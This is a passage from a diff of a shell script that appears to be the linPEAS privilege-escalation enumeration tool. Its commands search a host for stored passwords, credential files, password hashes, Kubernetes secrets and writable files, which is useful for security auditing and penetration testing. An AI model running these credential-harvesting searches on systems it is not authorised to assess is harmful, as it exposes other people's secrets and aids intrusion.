AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; elif echo "$entry" | grep -Eq "$writeVB"; then @@ -3630,111 +4034,634 @@ if echo $CHECKS | grep -q IntFiles; then echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done - done - echo "" - fi + fi + done + echo "" +fi - ##-- IF) Passwords in config PHP files +##-- IF) Passwords in history files +if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history files" + printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done + echo "" +fi + +##-- IF) Passwords in config PHP files +if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then print_2title "Searching passwords in config PHP files" printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done echo "" +fi - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" +##-- IF) Passwords files in home +if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching *password* or *credential* files in home (limit 70)" (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi fi + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +if [ "$DEBUG" ]; then + print_2title "Searching IPs inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + echo "" +fi + +##-- IF) Passwords inside logs +print_2title "Searching passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +if [ "$DEBUG" ]; then + ##-- IF) Emails inside logs + print_2title "Searching emails inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" +fi + + + + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Searching passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Searching passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Searching possible password variables inside key folders (limit 140)" + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + wait + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" + ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible regexes + print_2title "Searching Hashed Passwords" +print_3title "Searching Apr1 MD5 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +wait +print_3title "Searching Apache SHA (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE 